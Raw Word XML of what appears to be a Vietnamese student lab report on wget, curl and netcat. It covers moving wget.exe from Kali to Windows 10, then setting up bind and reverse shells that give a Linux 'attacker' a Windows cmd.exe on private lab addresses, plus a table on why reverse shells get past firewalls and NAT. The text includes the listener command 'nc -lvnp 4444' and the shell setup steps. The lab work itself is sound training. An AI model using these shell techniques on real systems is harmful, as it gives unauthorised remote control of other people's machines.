        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6404454E" w14:textId="53DD3691" w:rsidR="00B81FAD" w:rsidRDefault="00B81FAD" w:rsidP="00B81FAD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs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309A6511" wp14:editId="2BCB0458">
            <wp:extent cx="5764696" cy="27273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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5764696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338CE" w14:textId="5C0A5375" w:rsidR="00B81FAD" w:rsidRDefault="00B81FAD" w:rsidP="00B81FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F08CAE" w14:textId="77777777" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="00B81FAD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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34C81949" w14:textId="77777777" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="00B81FAD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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2B9E40B6" w14:textId="70D6A293" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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AD3398">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>14. Hãy cho biết đường đẫn thực thi của 2 lệnh wget và curl?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527DB3C" w14:textId="77777777" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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7FFDB5AE" w14:textId="77777777" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="00AD3398">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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AD3398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34772C44" wp14:editId="5AEA06C4">
            <wp:extent cx="3200847" cy="1190791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6353" w14:textId="77777777" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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AD3398">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>15. Theo bạn, trong 2 lệnh tải về wget và curl, lệnh nào ưu việt hơn? Giải thích?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D7EB9" w14:textId="19B0FF5F" w:rsidR="00AD3398" w:rsidRDefault="00AD3398" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7858">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-   Wget: </w:t>
      </w:r>
      <w:r w:rsidR="002B7858" w:rsidRPr="002B7858">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">lệnh sử dụng rộng rãi trong việc download, là phần mềm free bản quyền mở (copyleft license) </w:t>
      </w:r>
      <w:r w:rsidR="002B7858">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GNU GPL). Support nhiều tính năng riêng cho việc download (Vd: recursive download). =&gt; Thuận tiện hơn curl trong việc download. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3C450" w14:textId="77777777" w:rsidR="00F768C7" w:rsidRDefault="002B7858" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>- Curl: sử dụng mạnh trong việc truyền dữ liệu trên nhiều giao thức, xây dựng trên libcurl, chạy trên nhiều nền tảng hơn wget =&gt; Lệnh ưu việt hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13309D5A" w14:textId="65CD47AE" w:rsidR="00B81FAD" w:rsidRDefault="00AD3398" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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AD3398">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>16. Có thể sử dụng lệnh curl để thay đổi các HTTP header được hay không? Nếu được,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3398">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>cho ví dụ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43D8B9" w14:textId="333ABBA4" w:rsidR="00F768C7" w:rsidRPr="00F768C7" w:rsidRDefault="00F768C7" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs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Tất nhiên là được. HTTP GET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24163EBF" w14:textId="6F3D5705" w:rsidR="0033092C" w:rsidRDefault="0033092C" w:rsidP="0033092C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033092C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44368D02" wp14:editId="7BCC51C7">
            <wp:extent cx="5239481" cy="609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EBA2" w14:textId="77777777" w:rsidR="003553C8" w:rsidRDefault="003553C8" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs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3553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>17. Máy chủ nào sẽ đóng vai trò là server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323D42E" w14:textId="77777777" w:rsidR="007E0474" w:rsidRDefault="003553C8" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto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Máy chủ thực hiện việc listening là server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C40F2" w14:textId="7A6B5835" w:rsidR="003553C8" w:rsidRDefault="003553C8" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto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3553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>18. Máy chủ nào sẽ đóng vai trò là client?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192A1A9" w14:textId="77777777" w:rsidR="007E0474" w:rsidRDefault="003553C8" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="24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Máy chủ thực hiện việc gửi dữ liệu là client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63B628" w14:textId="108FA3FC" w:rsidR="003553C8" w:rsidRDefault="003553C8" w:rsidP="007E0474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3553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>19. Nếu khai báo lệnh “nc -lvnp 4444” thì thật chất, port 4444 được mở ở máy nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FFF00" w14:textId="77777777" w:rsidR="00E54152" w:rsidRDefault="00E54152" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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Port 4444 được mở tại chính máy đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6CA07" w14:textId="77777777" w:rsidR="00E54152" w:rsidRDefault="00E54152" w:rsidP="003553C8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1F39D920" w14:textId="711DC0F1" w:rsidR="00E54152" w:rsidRDefault="003553C8" w:rsidP="003553C8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3553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>20. Thực hiện chuyển tập tin wget.exe trên máy Kali sang máy Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FC089" w14:textId="443AA981" w:rsidR="00EE5242" w:rsidRDefault="00EE5242" w:rsidP="003553C8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Xác định vị trí file thực thi lệnh wget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC92F29" w14:textId="362DCF8F" w:rsidR="00EE5242" w:rsidRDefault="00EE5242" w:rsidP="00EE5242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EE5242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7500217C" wp14:editId="21118597">
            <wp:extent cx="4496427" cy="638264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74CC" w14:textId="79F3A30C" w:rsidR="00EE5242" w:rsidRDefault="00EE5242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- Bên phía Window, lắng nghe port 4444 và mọi file vào được đưa thành file </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5242">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>getcommand.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003AC3C0" w14:textId="366CA523" w:rsidR="00EE5242" w:rsidRDefault="00EE5242" w:rsidP="00EE5242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EE5242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0108116D" wp14:editId="2D9130AE">
            <wp:extent cx="5620534" cy="108600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7958" w14:textId="0040D09D" w:rsidR="00EE5242" w:rsidRDefault="00EE5242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Bên Linux, truyền file wget.exe với đường dẫn đã xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF5C8C" w14:textId="518FC9C3" w:rsidR="00EE5242" w:rsidRDefault="00EE5242" w:rsidP="00EE5242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EE5242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15883289" wp14:editId="5302F6C5">
            <wp:extent cx="5943600" cy="811530"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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168F" w14:textId="79DD2793" w:rsidR="00EE5242" w:rsidRDefault="00EE5242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- Bên Window đã nhận được, kiểm tra file </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5242">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wget.exe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 có hoạt động không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FEA29" w14:textId="77777777" w:rsidR="00654193" w:rsidRDefault="00EE5242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EE5242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07777657" wp14:editId="68FACE9F">
            <wp:extent cx="5943600" cy="161036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9138" w14:textId="77777777" w:rsidR="00654193" w:rsidRDefault="00654193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13FC3BE6" w14:textId="629D893D" w:rsidR="00654193" w:rsidRDefault="003553C8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3553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>21. Thực hiện lại chi tiết kịch bản Reverse Shell và Bind Shell sử dụng netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A6E3BE" w14:textId="59ABCB45" w:rsidR="00D7772A" w:rsidRDefault="00D7772A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Window: 192.168.1.4           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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>Linux: 192.168.79.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1E8DD" w14:textId="0A6BA850" w:rsidR="00457A43" w:rsidRDefault="00457A43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Window cài đặt gói nmap và ncat(giống với nc) để thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7D139" w14:textId="007D3330" w:rsidR="00654193" w:rsidRDefault="00654193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# Bind Shell: (Window nghe port, mở sẵn command khi connect, Linux attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E217BCC" w14:textId="20953EEF" w:rsidR="00654193" w:rsidRDefault="00654193" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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- Bên Window lắng nghe ở port 4444, kèm theo ứng dụng </w:t>
      </w:r>
      <w:r w:rsidR="00225D02">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>“Command Line” khi đối phương kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0EA32" w14:textId="13CE2775" w:rsidR="00654193" w:rsidRDefault="00654193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654193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43F1FDDA" wp14:editId="35A47C6C">
            <wp:extent cx="4486275" cy="699715"/>
            <wp:effectExtent l="0" t="0" r="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27"/>
                    <a:srcRect b="43226"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4486901" cy="69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C6F72" w14:textId="428D01CF" w:rsidR="00654193" w:rsidRDefault="00225D02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- Bên Linux connect đến </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793EC9FF" w14:textId="368B43E8" w:rsidR="00654193" w:rsidRDefault="00654193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654193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7136559C" wp14:editId="4C7F3AAE">
            <wp:extent cx="3943900" cy="80021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EFBA" w14:textId="02D092A6" w:rsidR="00225D02" w:rsidRDefault="00225D02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Phía Window phản hồi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16969B63" w14:textId="7FA0A9A4" w:rsidR="00225D02" w:rsidRDefault="00225D02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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="256E2E90" wp14:editId="23DA0FE6">
            <wp:extent cx="4485714" cy="1161905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688" w14:textId="58DE268F" w:rsidR="00225D02" w:rsidRDefault="00225D02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- Bên linux thực hiện bất kỳ lệnh nào trên </w:t>
      </w:r>
      <w:r w:rsidRPr="00225D02">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cmd.exe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 của Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72725FB4" w14:textId="77777777" w:rsidR="00225D02" w:rsidRDefault="00654193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654193">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04712765" wp14:editId="04010538">
            <wp:extent cx="4915586" cy="4143953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75DA" w14:textId="6FA3E8E7" w:rsidR="00225D02" w:rsidRDefault="00225D02" w:rsidP="00225D0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# Reverse Shell: (Window chủ động gửi terminal sang phía attacker, Linux  mở sẵn port và sẵn sàng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2AD57C" w14:textId="19EFAD3A" w:rsidR="00D7772A" w:rsidRDefault="00D7772A" w:rsidP="00225D0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Linux mở nghe sẵn tại port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F26A1" w14:textId="1AD55BD2" w:rsidR="00225D02" w:rsidRDefault="00225D02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225D02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4EC28A91" wp14:editId="184ACCB2">
            <wp:extent cx="5048955" cy="106694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414A" w14:textId="044557A1" w:rsidR="00D7772A" w:rsidRDefault="00D7772A" w:rsidP="00225D0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733F6140" w14:textId="6182C311" w:rsidR="00D7772A" w:rsidRDefault="00D7772A" w:rsidP="00225D0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708255E3" w14:textId="5325E930" w:rsidR="00D7772A" w:rsidRDefault="00D7772A" w:rsidP="00225D0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706FBCDD" w14:textId="09AD4FBE" w:rsidR="00D7772A" w:rsidRDefault="00D7772A" w:rsidP="00225D0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5323BE26" w14:textId="5033B34C" w:rsidR="00225D02" w:rsidRDefault="00D7772A" w:rsidP="00225D0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lastRenderedPageBreak/>
        <w:t>- Window thực hiện gửi cmd.exe khi kết nối vào thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D155994" w14:textId="6A724220" w:rsidR="00D7772A" w:rsidRDefault="00D7772A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D7772A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0A9BD9D7" wp14:editId="1800BEC9">
            <wp:extent cx="4801270" cy="47631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A575" w14:textId="04A065CF" w:rsidR="00D7772A" w:rsidRDefault="00D7772A" w:rsidP="00225D0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Linux tùy ý thực hiện lệnh lên terminal mà window đưa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C861814" w14:textId="12FCA358" w:rsidR="00457A43" w:rsidRPr="00D4581B" w:rsidRDefault="00D7772A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000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225D02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0F0B6B0F" wp14:editId="4416E196">
            <wp:extent cx="4420217" cy="1629002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3C8" w:rsidRPr="003553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003553C8" w:rsidRPr="00D4581B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>22. So sánh ưu và nhược điểm khi sử dụng Reverse Shell và Bind Shell? Khi nào nên</w:t>
      </w:r>
      <w:r w:rsidR="003553C8" w:rsidRPr="00D4581B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>sử dụng Bind Shell? Khi nào nên sử dụng Reverse Shell?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57A43" w14:paraId="44A74835" w14:textId="77777777" w:rsidTr="008162C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76C70EAC" w14:textId="77777777" w:rsidR="00457A43" w:rsidRDefault="00457A43" w:rsidP="008162C2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2880"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D8AD0D9" w14:textId="535BED33" w:rsidR="00457A43" w:rsidRDefault="00457A43" w:rsidP="008162C2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2880"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center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Bind Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="617AF21E" w14:textId="51C210AC" w:rsidR="00457A43" w:rsidRDefault="00457A43" w:rsidP="008162C2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2880"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center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Reverse Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00457A43" w14:paraId="2439494C" w14:textId="77777777" w:rsidTr="008162C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AB93FEF" w14:textId="28A36BF9" w:rsidR="00457A43" w:rsidRDefault="00457A43" w:rsidP="008162C2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2880"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center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Ưu điểm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FD69E26" w14:textId="680E397D" w:rsidR="00457A43" w:rsidRDefault="008162C2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- Kết nối thuật tiện, tạo vulnerabilities cho máy target, máy attacker an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="659CEDB7" w14:textId="77777777" w:rsidR="00457A43" w:rsidRDefault="008162C2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- Máy attacker vulnerable khi mở listening công khai</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD1993F" w14:textId="77777777" w:rsidR="008162C2" w:rsidRDefault="008162C2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 xml:space="preserve">- Khắc phục nhược điểm của </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="212120"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Bind Shell. </w:t>
            </w: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Vượt tường lửa, không cần chỉ remote IP’s host =&gt; Chống NAT/PAT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="277DE7FB" w14:textId="3A179700" w:rsidR="0025300C" w:rsidRPr="008162C2" w:rsidRDefault="0025300C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-&gt; Ứng dụng nhiều</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00457A43" w14:paraId="3EB02946" w14:textId="77777777" w:rsidTr="008162C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12081FD5" w14:textId="53B4B054" w:rsidR="00457A43" w:rsidRDefault="00457A43" w:rsidP="008162C2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2880"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center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Nhược điểm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28EBB30D" w14:textId="77777777" w:rsidR="00457A43" w:rsidRDefault="00457A43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>- Bất kỳ máy nào cũng có thể kết nối đến được máy target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC0C582" w14:textId="6B45015B" w:rsidR="00457A43" w:rsidRDefault="00457A43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lastRenderedPageBreak/>
              <w:t>- Firewall là một trở ngại trong việc kết nối</w:t>
            </w:r>
            <w:r w:rsidR="008162C2"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 xml:space="preserve"> (nếu port đặc biệt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5151E177" w14:textId="3608BDD5" w:rsidR="008162C2" w:rsidRDefault="008162C2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t xml:space="preserve">- NAT/PAT trong việc chuyển private IP, có thể chuyển port </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB9DD6F" w14:textId="2B808025" w:rsidR="00457A43" w:rsidRDefault="00457A43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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6170C7DC" w14:textId="09B5BFB1" w:rsidR="00457A43" w:rsidRDefault="0025300C" w:rsidP="008162C2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2880"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="212120"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Chưa tìm thấy (So với bind shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
